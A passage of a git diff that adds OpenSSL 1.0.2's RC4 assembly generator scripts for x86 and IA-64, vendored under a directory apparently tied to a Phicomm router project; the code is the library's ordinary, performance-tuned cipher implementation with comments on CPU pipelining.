+	&mov	(&DWP(0,$dat,$XX[0],4),$ty);
+	&add	(&LB($ty),&LB($tx));
+	&movd	(@XX[0],"mm7")				if ($i==0);
+	&mov	($tx,&DWP(0,$dat,@XX[1],4));
+	&pxor	("mm1","mm1")				if ($i==1);
+	&movq	("mm2",&QWP(0,$inp))			if ($i==1);
+	&movq	(&QWP(-8,(@XX[0],$inp)),"mm1")		if ($i==0);
+	&pinsrw	($mm,&DWP(0,$dat,$ty,4),$j);
+
+	push	(@XX,shift(@XX))			if ($i>=0);
+  }
+} else {
+  # Using pinsrw here improves performane on Intel CPUs by 2-3%, but
+  # brings down AMD by 7%...
+  $RC4_loop_mmx = sub {
+    my $i=shift;
+
+	&add	(&LB($yy),&LB($tx));
+	&psllq	("mm1",8*(($i-1)&7))			if (abs($i)!=1);
+	&mov	($ty,&DWP(0,$dat,$yy,4));
+	&mov	(&DWP(0,$dat,$yy,4),$tx);
+	&mov	(&DWP(0,$dat,$xx,4),$ty);
+	&inc	($xx);
+	&add	($ty,$tx);
+	&movz	($xx,&LB($xx));				# (*)
+	&movz	($ty,&LB($ty));				# (*)
+	&pxor	("mm2",$i==1?"mm0":"mm1")		if ($i>=0);
+	&movq	("mm0",&QWP(0,$inp))			if ($i<=0);
+	&movq	(&QWP(-8,($out,$inp)),"mm2")		if ($i==0);
+	&mov	($tx,&DWP(0,$dat,$xx,4));
+	&movd	($i>0?"mm1":"mm2",&DWP(0,$dat,$ty,4));
+
+	# (*)	This is the key to Core2 and Westmere performance.
+	#	Whithout movz out-of-order execution logic confuses
+	#	itself and fails to reorder loads and stores. Problem
+	#	appears to be fixed in Sandy Bridge...
+  }
+}
+
+&external_label("OPENSSL_ia32cap_P");
+
+# void RC4(RC4_KEY *key,size_t len,const unsigned char *inp,unsigned char *out);
+&function_begin("RC4");
+	&mov	($dat,&wparam(0));	# load key schedule pointer
+	&mov	($ty, &wparam(1));	# load len
+	&mov	($inp,&wparam(2));	# load inp
+	&mov	($out,&wparam(3));	# load out
+
+	&xor	($xx,$xx);		# avoid partial register stalls
+	&xor	($yy,$yy);
+
+	&cmp	($ty,0);		# safety net
+	&je	(&label("abort"));
+
+	&mov	(&LB($xx),&BP(0,$dat));	# load key->x
+	&mov	(&LB($yy),&BP(4,$dat));	# load key->y
+	&add	($dat,8);
+
+	&lea	($tx,&DWP(0,$inp,$ty));
+	&sub	($out,$inp);		# re-bias out
+	&mov	(&wparam(1),$tx);	# save input+len
+
+	&inc	(&LB($xx));
+
+	# detect compressed key schedule...
+	&cmp	(&DWP(256,$dat),-1);
+	&je	(&label("RC4_CHAR"));
+
+	&mov	($tx,&DWP(0,$dat,$xx,4));
+
+	&and	($ty,-4);		# how many 4-byte chunks?
+	&jz	(&label("loop1"));
+
+	&mov	(&wparam(3),$out);	# $out as accumulator in these loops
+					if ($x86only) {
+	&jmp	(&label("go4loop4"));
+					} else {
+	&test	($ty,-8);
+	&jz	(&label("go4loop4"));
+
+	&picmeup($out,"OPENSSL_ia32cap_P");
+	&bt	(&DWP(0,$out),26);	# check SSE2 bit [could have been MMX]
+	&jnc	(&label("go4loop4"));
+
+	&mov	($out,&wparam(3))	if (!$alt);
+	&movd	("mm7",&wparam(3))	if ($alt);
+	&and	($ty,-8);
+	&lea	($ty,&DWP(-8,$inp,$ty));
+	&mov	(&DWP(-4,$dat),$ty);	# save input+(len/8)*8-8
+
+	&$RC4_loop_mmx(-1);
+	&jmp(&label("loop_mmx_enter"));
+
+	&set_label("loop_mmx",16);
+		&$RC4_loop_mmx(0);
+	&set_label("loop_mmx_enter");
+		for 	($i=1;$i<8;$i++) { &$RC4_loop_mmx($i); }
+		&mov	($ty,$yy);
+		&xor	($yy,$yy);		# this is second key to Core2
+		&mov	(&LB($yy),&LB($ty));	# and Westmere performance...
+		&cmp	($inp,&DWP(-4,$dat));
+		&lea	($inp,&DWP(8,$inp));
+	&jb	(&label("loop_mmx"));
+
+    if ($alt) {
+	&movd	($out,"mm7");
+	&pxor	("mm2","mm0");
+	&psllq	("mm1",8);
+	&pxor	("mm1","mm2");
+	&movq	(&QWP(-8,$out,$inp),"mm1");
+    } else {
+	&psllq	("mm1",56);
+	&pxor	("mm2","mm1");
+	&movq	(&QWP(-8,$out,$inp),"mm2");
+    }
+	&emms	();
+
+	&cmp	($inp,&wparam(1));	# compare to input+len
+	&je	(&label("done"));
+	&jmp	(&label("loop1"));
+					}
+
+&set_label("go4loop4",16);
+	&lea	($ty,&DWP(-4,$inp,$ty));
+	&mov	(&wparam(2),$ty);	# save input+(len/4)*4-4
+
+	&set_label("loop4");
+		for ($i=0;$i<4;$i++) { RC4_loop($i); }
+		&ror	($out,8);
+		&xor	($out,&DWP(0,$inp));
+		&cmp	($inp,&wparam(2));	# compare to input+(len/4)*4-4
+		&mov	(&DWP(0,$tx,$inp),$out);# $tx holds re-biased out here
+		&lea	($inp,&DWP(4,$inp));
+		&mov	($tx,&DWP(0,$dat,$xx,4));
+	&jb	(&label("loop4"));
+
+	&cmp	($inp,&wparam(1));	# compare to input+len
+	&je	(&label("done"));
+	&mov	($out,&wparam(3));	# restore $out
+
+	&set_label("loop1",16);
+		&add	(&LB($yy),&LB($tx));
+		&mov	($ty,&DWP(0,$dat,$yy,4));
+		&mov	(&DWP(0,$dat,$yy,4),$tx);
+		&mov	(&DWP(0,$dat,$xx,4),$ty);
+		&add	($ty,$tx);
+		&inc	(&LB($xx));
+		&and	($ty,0xff);
+		&mov	($ty,&DWP(0,$dat,$ty,4));
+		&xor	(&LB($ty),&BP(0,$inp));
+		&lea	($inp,&DWP(1,$inp));
+		&mov	($tx,&DWP(0,$dat,$xx,4));
+		&cmp	($inp,&wparam(1));	# compare to input+len
+		&mov	(&BP(-1,$out,$inp),&LB($ty));
+	&jb	(&label("loop1"));
+
+	&jmp	(&label("done"));
+
+# this is essentially Intel P4 specific codepath...
+&set_label("RC4_CHAR",16);
+	&movz	($tx,&BP(0,$dat,$xx));
+	# strangely enough unrolled loop performs over 20% slower...
+	&set_label("cloop1");
+		&add	(&LB($yy),&LB($tx));
+		&movz	($ty,&BP(0,$dat,$yy));
+		&mov	(&BP(0,$dat,$yy),&LB($tx));
+		&mov	(&BP(0,$dat,$xx),&LB($ty));
+		&add	(&LB($ty),&LB($tx));
+		&movz	($ty,&BP(0,$dat,$ty));
+		&add	(&LB($xx),1);
+		&xor	(&LB($ty),&BP(0,$inp));
+		&lea	($inp,&DWP(1,$inp));
+		&movz	($tx,&BP(0,$dat,$xx));
+		&cmp	($inp,&wparam(1));
+		&mov	(&BP(-1,$out,$inp),&LB($ty));
+	&jb	(&label("cloop1"));
+
+&set_label("done");
+	&dec	(&LB($xx));
+	&mov	(&DWP(-4,$dat),$yy);		# save key->y
+	&mov	(&BP(-8,$dat),&LB($xx));	# save key->x
+&set_label("abort");
+&function_end("RC4");
+
+########################################################################
+
+$inp="esi";
+$out="edi";
+$idi="ebp";
+$ido="ecx";
+$idx="edx";
+
+# void RC4_set_key(RC4_KEY *key,int len,const unsigned char *data);
+&function_begin("private_RC4_set_key");
+	&mov	($out,&wparam(0));		# load key
+	&mov	($idi,&wparam(1));		# load len
+	&mov	($inp,&wparam(2));		# load data
+	&picmeup($idx,"OPENSSL_ia32cap_P");
+
+	&lea	($out,&DWP(2*4,$out));		# &key->data
+	&lea	($inp,&DWP(0,$inp,$idi));	# $inp to point at the end
+	&neg	($idi);
+	&xor	("eax","eax");
+	&mov	(&DWP(-4,$out),$idi);		# borrow key->y
+
+	&bt	(&DWP(0,$idx),20);		# check for bit#20
+	&jc	(&label("c1stloop"));
+
+&set_label("w1stloop",16);
+	&mov	(&DWP(0,$out,"eax",4),"eax");	# key->data[i]=i;
+	&add	(&LB("eax"),1);			# i++;
+	&jnc	(&label("w1stloop"));
+
+	&xor	($ido,$ido);
+	&xor	($idx,$idx);
+
+&set_label("w2ndloop",16);
+	&mov	("eax",&DWP(0,$out,$ido,4));
+	&add	(&LB($idx),&BP(0,$inp,$idi));
+	&add	(&LB($idx),&LB("eax"));
+	&add	($idi,1);
+	&mov	("ebx",&DWP(0,$out,$idx,4));
+	&jnz	(&label("wnowrap"));
+	  &mov	($idi,&DWP(-4,$out));
+	&set_label("wnowrap");
+	&mov	(&DWP(0,$out,$idx,4),"eax");
+	&mov	(&DWP(0,$out,$ido,4),"ebx");
+	&add	(&LB($ido),1);
+	&jnc	(&label("w2ndloop"));
+&jmp	(&label("exit"));
+
+# Unlike all other x86 [and x86_64] implementations, Intel P4 core
+# [including EM64T] was found to perform poorly with above "32-bit" key
+# schedule, a.k.a. RC4_INT. Performance improvement for IA-32 hand-coded
+# assembler turned out to be 3.5x if re-coded for compressed 8-bit one,
+# a.k.a. RC4_CHAR! It's however inappropriate to just switch to 8-bit
+# schedule for x86[_64], because non-P4 implementations suffer from
+# significant performance losses then, e.g. PIII exhibits >2x
+# deterioration, and so does Opteron. In order to assure optimal
+# all-round performance, we detect P4 at run-time and set up compressed
+# key schedule, which is recognized by RC4 procedure.
+
+&set_label("c1stloop",16);
+	&mov	(&BP(0,$out,"eax"),&LB("eax"));	# key->data[i]=i;
+	&add	(&LB("eax"),1);			# i++;
+	&jnc	(&label("c1stloop"));
+
+	&xor	($ido,$ido);
+	&xor	($idx,$idx);
+	&xor	("ebx","ebx");
+
+&set_label("c2ndloop",16);
+	&mov	(&LB("eax"),&BP(0,$out,$ido));
+	&add	(&LB($idx),&BP(0,$inp,$idi));
+	&add	(&LB($idx),&LB("eax"));
+	&add	($idi,1);
+	&mov	(&LB("ebx"),&BP(0,$out,$idx));
+	&jnz	(&label("cnowrap"));
+	  &mov	($idi,&DWP(-4,$out));
+	&set_label("cnowrap");
+	&mov	(&BP(0,$out,$idx),&LB("eax"));
+	&mov	(&BP(0,$out,$ido),&LB("ebx"));
+	&add	(&LB($ido),1);
+	&jnc	(&label("c2ndloop"));
+
+	&mov	(&DWP(256,$out),-1);		# mark schedule as compressed
+
+&set_label("exit");
+	&xor	("eax","eax");
+	&mov	(&DWP(-8,$out),"eax");		# key->x=0;
+	&mov	(&DWP(-4,$out),"eax");		# key->y=0;
+&function_end("private_RC4_set_key");
+
+# const char *RC4_options(void);
+&function_begin_B("RC4_options");
+	&call	(&label("pic_point"));
+&set_label("pic_point");
+	&blindpop("eax");
+	&lea	("eax",&DWP(&label("opts")."-".&label("pic_point"),"eax"));
+	&picmeup("edx","OPENSSL_ia32cap_P");
+	&mov	("edx",&DWP(0,"edx"));
+	&bt	("edx",20);
+	&jc	(&label("1xchar"));
+	&bt	("edx",26);
+	&jnc	(&label("ret"));
+	&add	("eax",25);
+	&ret	();
+&set_label("1xchar");
+	&add	("eax",12);
+&set_label("ret");
+	&ret	();
+&set_label("opts",64);
+&asciz	("rc4(4x,int)");
+&asciz	("rc4(1x,char)");
+&asciz	("rc4(8x,mmx)");
+&asciz	("RC4 for x86, CRYPTOGAMS by <appro\@openssl.org>");
+&align	(64);
+&function_end_B("RC4_options");
+
+&asm_finish();
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-ia64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-ia64.pl
new file mode 100644
index 0000000..49cd5b5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-ia64.pl
@@ -0,0 +1,755 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by David Mosberger <David.Mosberger@acm.org> based on the
+# Itanium optimized Crypto code which was released by HP Labs at
+# http://www.hpl.hp.com/research/linux/crypto/.
+#
+# Copyright (c) 2005 Hewlett-Packard Development Company, L.P.
+#
+# Permission is hereby granted, free of charge, to any person obtaining
+# a copy of this software and associated documentation files (the
+# "Software"), to deal in the Software without restriction, including
+# without limitation the rights to use, copy, modify, merge, publish,
+# distribute, sublicense, and/or sell copies of the Software, and to
+# permit persons to whom the Software is furnished to do so, subject to
+# the following conditions:
+#
+# The above copyright notice and this permission notice shall be
+# included in all copies or substantial portions of the Software.
+
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
+# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
+# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
+# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.  */
+
+
+
+# This is a little helper program which generates a software-pipelined
+# for RC4 encryption.  The basic algorithm looks like this:
+#
+#   for (counter = 0; counter < len; ++counter)
+#     {
+#       in = inp[counter];
+#       SI = S[I];
+#       J = (SI + J) & 0xff;
+#       SJ = S[J];
+#       T = (SI + SJ) & 0xff;
+#       S[I] = SJ, S[J] = SI;
+#       ST = S[T];
+#       outp[counter] = in ^ ST;
+#       I = (I + 1) & 0xff;
+#     }
+#
+# Pipelining this loop isn't easy, because the stores to the S[] array
+# need to be observed in the right order.  The loop generated by the
+# code below has the following pipeline diagram:
+#
+#      cycle
+#     | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |10 |11 |12 |13 |14 |15 |16 |17 |
+# iter
+#   1: xxx LDI xxx xxx xxx LDJ xxx SWP xxx LDT xxx xxx
+#   2:             xxx LDI xxx xxx xxx LDJ xxx SWP xxx LDT xxx xxx
+#   3:                         xxx LDI xxx xxx xxx LDJ xxx SWP xxx LDT xxx xxx
+#
+#   where:
+# 	LDI = load of S[I]
+# 	LDJ = load of S[J]
+# 	SWP = swap of S[I] and S[J]
+# 	LDT = load of S[T]
+#
+# Note that in the above diagram, the major trouble-spot is that LDI
+# of the 2nd iteration is performed BEFORE the SWP of the first
+# iteration.  Fortunately, this is easy to detect (I of the 1st
+# iteration will be equal to J of the 2nd iteration) and when this
+# happens, we simply forward the proper value from the 1st iteration
+# to the 2nd one.  The proper value in this case is simply the value
+# of S[I] from the first iteration (thanks to the fact that SWP
+# simply swaps the contents of S[I] and S[J]).
+#
+# Another potential trouble-spot is in cycle 7, where SWP of the 1st
+# iteration issues at the same time as the LDI of the 3rd iteration.
+# However, thanks to IA-64 execution semantics, this can be taken
+# care of simply by placing LDI later in the instruction-group than
+# SWP.  IA-64 CPUs will automatically forward the value if they
+# detect that the SWP and LDI are accessing the same memory-location.
+
+# The core-loop that can be pipelined then looks like this (annotated
+# with McKinley/Madison issue port & latency numbers, assuming L1
+# cache hits for the most part):
+
+# operation:	    instruction:		    issue-ports:  latency
+# ------------------  -----------------------------   ------------- -------
+
+# Data = *inp++       ld1 data = [inp], 1             M0-M1         1 cyc     c0
+#                     shladd Iptr = I, KeyTable, 3    M0-M3, I0, I1 1 cyc
+# I = (I + 1) & 0xff  padd1 nextI = I, one            M0-M3, I0, I1 3 cyc
+#                     ;;
+# SI = S[I]           ld8 SI = [Iptr]                 M0-M1         1 cyc     c1 * after SWAP!
+#                     ;;
+#                     cmp.eq.unc pBypass = I, J                                  * after J is valid!
+# J = SI + J          add J = J, SI                   M0-M3, I0, I1 1 cyc     c2
+#                     (pBypass) br.cond.spnt Bypass
+#                     ;;
+# ---------------------------------------------------------------------------------------
+# J = J & 0xff        zxt1 J = J                      I0, I1, 1 cyc           c3
+#                     ;;
+#                     shladd Jptr = J, KeyTable, 3    M0-M3, I0, I1 1 cyc     c4
+#                     ;;
+# SJ = S[J]           ld8 SJ = [Jptr]                 M0-M1         1 cyc     c5
+#                     ;;
+# ---------------------------------------------------------------------------------------
+# T = (SI + SJ)       add T = SI, SJ                  M0-M3, I0, I1 1 cyc     c6
+#                     ;;
+# T = T & 0xff        zxt1 T = T                      I0, I1        1 cyc
+# S[I] = SJ           st8 [Iptr] = SJ                 M2-M3                   c7
+# S[J] = SI           st8 [Jptr] = SI                 M2-M3
+#                     ;;
+#                     shladd Tptr = T, KeyTable, 3    M0-M3, I0, I1 1 cyc     c8
+#                     ;;
+# ---------------------------------------------------------------------------------------
+# T = S[T]            ld8 T = [Tptr]                  M0-M1         1 cyc     c9
+#                     ;;
+# data ^= T           xor data = data, T              M0-M3, I0, I1 1 cyc     c10
+#                     ;;
+# *out++ = Data ^ T   dep word = word, data, 8, POS   I0, I1        1 cyc     c11
+#                     ;;
+# ---------------------------------------------------------------------------------------
+
+# There are several points worth making here:
+
+#   - Note that due to the bypass/forwarding-path, the first two
+#     phases of the loop are strangly mingled together.  In
+#     particular, note that the first stage of the pipeline is
+#     using the value of "J", as calculated by the second stage.
+#   - Each bundle-pair will have exactly 6 instructions.
+#   - Pipelined, the loop can execute in 3 cycles/iteration and
+#     4 stages.  However, McKinley/Madison can issue "st1" to
+#     the same bank at a rate of at most one per 4 cycles.  Thus,
+#     instead of storing each byte, we accumulate them in a word
+#     and then write them back at once with a single "st8" (this
+#     implies that the setup code needs to ensure that the output
+#     buffer is properly aligned, if need be, by encoding the
+#     first few bytes separately).
+#   - There is no space for a "br.ctop" instruction.  For this
+#     reason we can't use module-loop support in IA-64 and have
+#     to do a traditional, purely software-pipelined loop.
+#   - We can't replace any of the remaining "add/zxt1" pairs with
+#     "padd1" because the latency for that instruction is too high
+#     and would push the loop to the point where more bypasses
+#     would be needed, which we don't have space for.
+#   - The above loop runs at around 3.26 cycles/byte, or roughly
+#     440 MByte/sec on a 1.5GHz Madison.  This is well below the
+#     system bus bandwidth and hence with judicious use of
+#     "lfetch" this loop can run at (almost) peak speed even when
+#     the input and output data reside in memory.  The
+#     max. latency that can be tolerated is (PREFETCH_DISTANCE *
+#     L2_LINE_SIZE * 3 cyc), or about 384 cycles assuming (at
+#     least) 1-ahead prefetching of 128 byte cache-lines.  Note
+#     that we do NOT prefetch into L1, since that would only
+#     interfere with the S[] table values stored there.  This is
+#     acceptable because there is a 10 cycle latency between
+#     load and first use of the input data.
+#   - We use a branch to out-of-line bypass-code of cycle-pressure:
+#     we calculate the next J, check for the need to activate the
+#     bypass path, and activate the bypass path ALL IN THE SAME
+#     CYCLE.  If we didn't have these constraints, we could do
+#     the bypass with a simple conditional move instruction.
+#     Fortunately, the bypass paths get activated relatively
+#     infrequently, so the extra branches don't cost all that much
+#     (about 0.04 cycles/byte, measured on a 16396 byte file with
+#     random input data).
+#
+
+$phases = 4;		# number of stages/phases in the pipelined-loop
+$unroll_count = 6;	# number of times we unrolled it
+$pComI = (1 << 0);
+$pComJ = (1 << 1);
+$pComT = (1 << 2);
+$pOut  = (1 << 3);
+
+$NData = 4;
+$NIP = 3;
+$NJP = 2;
+$NI = 2;
+$NSI = 3;
+$NSJ = 2;
+$NT = 2;
+$NOutWord = 2;
+
+#
+# $threshold is the minimum length before we attempt to use the
+# big software-pipelined loop.  It MUST be greater-or-equal
+# to:
+#  		PHASES * (UNROLL_COUNT + 1) + 7
+#
+# The "+ 7" comes from the fact we may have to encode up to
+#   7 bytes separately before the output pointer is aligned.
+#
+$threshold = (3 * ($phases * ($unroll_count + 1)) + 7);
+
+sub I {
+    local *code = shift;
+    local $format = shift;
+    $code .= sprintf ("\t\t".$format."\n", @_);
+}
+
+sub P {
+    local *code = shift;
+    local $format = shift;
+    $code .= sprintf ($format."\n", @_);
+}
+
+sub STOP {
+    local *code = shift;
+    $code .=<<___;
+		;;
+___
+}
+
+sub emit_body {
+    local *c = shift;
+    local *bypass = shift;
+    local ($iteration, $p) = @_;
+
+    local $i0 = $iteration;
+    local $i1 = $iteration - 1;
+    local $i2 = $iteration - 2;
+    local $i3 = $iteration - 3;
+    local $iw0 = ($iteration - 3) / 8;
+    local $iw1 = ($iteration > 3) ? ($iteration - 4) / 8 : 1;
+    local $byte_num = ($iteration - 3) % 8;
+    local $label = $iteration + 1;
+    local $pAny = ($p & 0xf) == 0xf;
+    local $pByp = (($p & $pComI) && ($iteration > 0));
+
+    $c.=<<___;
+//////////////////////////////////////////////////
+___
+
+    if (($p & 0xf) == 0) {
+	$c.="#ifdef HOST_IS_BIG_ENDIAN\n";
+	&I(\$c,"shr.u	OutWord[%u] = OutWord[%u], 32;;",
+				$iw1 % $NOutWord, $iw1 % $NOutWord);
+	$c.="#endif\n";
+	&I(\$c, "st4 [OutPtr] = OutWord[%u], 4", $iw1 % $NOutWord);
+	return;
+    }
+
+    # Cycle 0
+    &I(\$c, "{ .mmi")					      if ($pAny);
+    &I(\$c, "ld1    Data[%u] = [InPtr], 1", $i0 % $NData)     if ($p & $pComI);
+    &I(\$c, "padd1  I[%u] = One, I[%u]", $i0 % $NI, $i1 % $NI)if ($p & $pComI);
+    &I(\$c, "zxt1   J = J")				      if ($p & $pComJ);
+    &I(\$c, "}")					      if ($pAny);
+    &I(\$c, "{ .mmi")					      if ($pAny);
+    &I(\$c, "LKEY   T[%u] = [T[%u]]", $i1 % $NT, $i1 % $NT)   if ($p & $pOut);
+    &I(\$c, "add    T[%u] = SI[%u], SJ[%u]",
+       $i0 % $NT, $i2 % $NSI, $i1 % $NSJ)		      if ($p & $pComT);
+    &I(\$c, "KEYADDR(IPr[%u], I[%u])", $i0 % $NIP, $i1 % $NI) if ($p & $pComI);
+    &I(\$c, "}")					      if ($pAny);
+    &STOP(\$c);
+
+    # Cycle 1
+    &I(\$c, "{ .mmi")					      if ($pAny);
+    &I(\$c, "SKEY   [IPr[%u]] = SJ[%u]", $i2 % $NIP, $i1%$NSJ)if ($p & $pComT);
+    &I(\$c, "SKEY   [JP[%u]] = SI[%u]", $i1 % $NJP, $i2%$NSI) if ($p & $pComT);
+    &I(\$c, "zxt1   T[%u] = T[%u]", $i0 % $NT, $i0 % $NT)     if ($p & $pComT);
+    &I(\$c, "}")					      if ($pAny);
+    &I(\$c, "{ .mmi")					      if ($pAny);
+    &I(\$c, "LKEY   SI[%u] = [IPr[%u]]", $i0 % $NSI, $i0%$NIP)if ($p & $pComI);
+    &I(\$c, "KEYADDR(JP[%u], J)", $i0 % $NJP)		      if ($p & $pComJ);
+    &I(\$c, "xor    Data[%u] = Data[%u], T[%u]",
+       $i3 % $NData, $i3 % $NData, $i1 % $NT)		      if ($p & $pOut);
+    &I(\$c, "}")					      if ($pAny);
+    &STOP(\$c);
+
+    # Cycle 2
+    &I(\$c, "{ .mmi")					      if ($pAny);
+    &I(\$c, "LKEY   SJ[%u] = [JP[%u]]", $i0 % $NSJ, $i0%$NJP) if ($p & $pComJ);
+    &I(\$c, "cmp.eq pBypass, p0 = I[%u], J", $i1 % $NI)	      if ($pByp);
+    &I(\$c, "dep OutWord[%u] = Data[%u], OutWord[%u], BYTE_POS(%u), 8",
+       $iw0%$NOutWord, $i3%$NData, $iw1%$NOutWord, $byte_num) if ($p & $pOut);
+    &I(\$c, "}")					      if ($pAny);
+    &I(\$c, "{ .mmb")					      if ($pAny);
+    &I(\$c, "add    J = J, SI[%u]", $i0 % $NSI)		      if ($p & $pComI);
+    &I(\$c, "KEYADDR(T[%u], T[%u])", $i0 % $NT, $i0 % $NT)    if ($p & $pComT);
+    &P(\$c, "(pBypass)\tbr.cond.spnt.many .rc4Bypass%u",$label)if ($pByp);
+    &I(\$c, "}") if ($pAny);
+    &STOP(\$c);
+
+    &P(\$c, ".rc4Resume%u:", $label)			      if ($pByp);
+    if ($byte_num == 0 && $iteration >= $phases) {
+	&I(\$c, "st8 [OutPtr] = OutWord[%u], 8",
+	   $iw1 % $NOutWord)				      if ($p & $pOut);
+	if ($iteration == (1 + $unroll_count) * $phases - 1) {
+	    if ($unroll_count == 6) {
+		&I(\$c, "mov OutWord[%u] = OutWord[%u]",
+		   $iw1 % $NOutWord, $iw0 % $NOutWord);
+	    }
+	    &I(\$c, "lfetch.nt1 [InPrefetch], %u",
+	       $unroll_count * $phases);
+	    &I(\$c, "lfetch.excl.nt1 [OutPrefetch], %u",
+	       $unroll_count * $phases);
+	    &I(\$c, "br.cloop.sptk.few .rc4Loop");
+	}
+    }
+
+    if ($pByp) {
+	&P(\$bypass, ".rc4Bypass%u:", $label);
+	&I(\$bypass, "sub J = J, SI[%u]", $i0 % $NSI);
+	&I(\$bypass, "nop 0");
+	&I(\$bypass, "nop 0");
+	&I(\$bypass, ";;");
+	&I(\$bypass, "add J = J, SI[%u]", $i1 % $NSI);
+	&I(\$bypass, "mov SI[%u] = SI[%u]", $i0 % $NSI, $i1 % $NSI);
+	&I(\$bypass, "br.sptk.many .rc4Resume%u\n", $label);
+	&I(\$bypass, ";;");
+    }
+}
+
+$code=<<___;
+.ident \"rc4-ia64.s, version 3.0\"
+.ident \"Copyright (c) 2005 Hewlett-Packard Development Company, L.P.\"
+
+#define LCSave		r8
+#define PRSave		r9
+
+/* Inputs become invalid once rotation begins!  */
+
+#define StateTable	in0
+#define DataLen		in1
+#define InputBuffer	in2
+#define OutputBuffer	in3
+
+#define KTable		r14
+#define J		r15
+#define InPtr		r16
+#define OutPtr		r17
+#define InPrefetch	r18
+#define OutPrefetch	r19
+#define One		r20
+#define LoopCount	r21
+#define Remainder	r22
+#define IFinal		r23
+#define EndPtr		r24
+
+#define tmp0		r25
+#define tmp1		r26
+
+#define pBypass		p6
+#define pDone		p7
+#define pSmall		p8
+#define pAligned	p9
+#define pUnaligned	p10
+
+#define pComputeI	pPhase[0]
+#define pComputeJ	pPhase[1]
+#define pComputeT	pPhase[2]
+#define pOutput		pPhase[3]
+
+#define RetVal		r8
+#define L_OK		p7
+#define L_NOK		p8
+
+#define	_NINPUTS	4
+#define	_NOUTPUT	0
+
+#define	_NROTATE	24
+#define	_NLOCALS	(_NROTATE - _NINPUTS - _NOUTPUT)
+
+#ifndef SZ
+# define SZ	4	// this must be set to sizeof(RC4_INT)
+#endif
+
+#if SZ == 1
+# define LKEY			ld1
+# define SKEY			st1
+# define KEYADDR(dst, i)	add dst = i, KTable
+#elif SZ == 2
+# define LKEY			ld2
+# define SKEY			st2
+# define KEYADDR(dst, i)	shladd dst = i, 1, KTable
+#elif SZ == 4
+# define LKEY			ld4
+# define SKEY			st4
+# define KEYADDR(dst, i)	shladd dst = i, 2, KTable
+#else
+# define LKEY			ld8
+# define SKEY			st8
+# define KEYADDR(dst, i)	shladd dst = i, 3, KTable
+#endif
+
+#if defined(_HPUX_SOURCE) && !defined(_LP64)
+# define ADDP	addp4
+#else
+# define ADDP	add
+#endif
+
+/* Define a macro for the bit number of the n-th byte: */
+
+#if defined(_HPUX_SOURCE) || defined(B_ENDIAN)
+# define HOST_IS_BIG_ENDIAN
+# define BYTE_POS(n)	(56 - (8 * (n)))
+#else
+# define BYTE_POS(n)	(8 * (n))
+#endif
+
+/*
+   We must perform the first phase of the pipeline explicitly since
+   we will always load from the stable the first time. The br.cexit
+   will never be taken since regardless of the number of bytes because
+   the epilogue count is 4.
+*/
+/* MODSCHED_RC4 macro was split to _PROLOGUE and _LOOP, because HP-UX
+   assembler failed on original macro with syntax error. <appro> */
+#define MODSCHED_RC4_PROLOGUE						   \\
+	{								   \\
+				ld1		Data[0] = [InPtr], 1;	   \\
+				add		IFinal = 1, I[1];	   \\
+				KEYADDR(IPr[0], I[1]);			   \\
+	} ;;								   \\
+	{								   \\
+				LKEY		SI[0] = [IPr[0]];	   \\
+				mov		pr.rot = 0x10000;	   \\
+				mov		ar.ec = 4;		   \\
+	} ;;								   \\
+	{								   \\
+				add		J = J, SI[0];		   \\
+				zxt1		I[0] = IFinal;		   \\
+				br.cexit.spnt.few .+16; /* never taken */  \\
+	} ;;
+#define MODSCHED_RC4_LOOP(label)					   \\
+label:									   \\
+	{	.mmi;							   \\
+		(pComputeI)	ld1		Data[0] = [InPtr], 1;	   \\
+		(pComputeI)	add		IFinal = 1, I[1];	   \\
+		(pComputeJ)	zxt1		J = J;			   \\
+	}{	.mmi;							   \\
+		(pOutput)	LKEY		T[1] = [T[1]];		   \\
+		(pComputeT)	add		T[0] = SI[2], SJ[1];	   \\
+		(pComputeI)	KEYADDR(IPr[0], I[1]);			   \\
+	} ;;								   \\
+	{	.mmi;							   \\
+		(pComputeT)	SKEY		[IPr[2]] = SJ[1];	   \\
+		(pComputeT)	SKEY		[JP[1]] = SI[2];	   \\
+		(pComputeT)	zxt1		T[0] = T[0];		   \\
+	}{	.mmi;							   \\
+		(pComputeI)	LKEY		SI[0] = [IPr[0]];	   \\
+		(pComputeJ)	KEYADDR(JP[0], J);			   \\
+		(pComputeI)	cmp.eq.unc	pBypass, p0 = I[1], J;	   \\
+	} ;;								   \\
+	{	.mmi;							   \\
+		(pComputeJ)	LKEY		SJ[0] = [JP[0]];	   \\
+		(pOutput)	xor		Data[3] = Data[3], T[1];   \\
+				nop		0x0;			   \\
+	}{	.mmi;							   \\
+		(pComputeT)	KEYADDR(T[0], T[0]);			   \\
+		(pBypass)	mov		SI[0] = SI[1];		   \\
+		(pComputeI)	zxt1		I[0] = IFinal;		   \\
+	} ;;								   \\
+	{	.mmb;							   \\
+		(pOutput)	st1		[OutPtr] = Data[3], 1;	   \\
+		(pComputeI)	add		J = J, SI[0];		   \\
+				br.ctop.sptk.few label;			   \\
+	} ;;
+
+	.text
+
+	.align	32
+
+	.type	RC4, \@function
+	.global	RC4
+
+	.proc	RC4
+	.prologue
+
+RC4:
+	{
+	  	.mmi
+		alloc	r2 = ar.pfs, _NINPUTS, _NLOCALS, _NOUTPUT, _NROTATE
+
+		.rotr Data[4], I[2], IPr[3], SI[3], JP[2], SJ[2], T[2], \\
+		      OutWord[2]
+		.rotp pPhase[4]
+
+		ADDP		InPrefetch = 0, InputBuffer
+		ADDP		KTable = 0, StateTable
+	}
+	{
+		.mmi
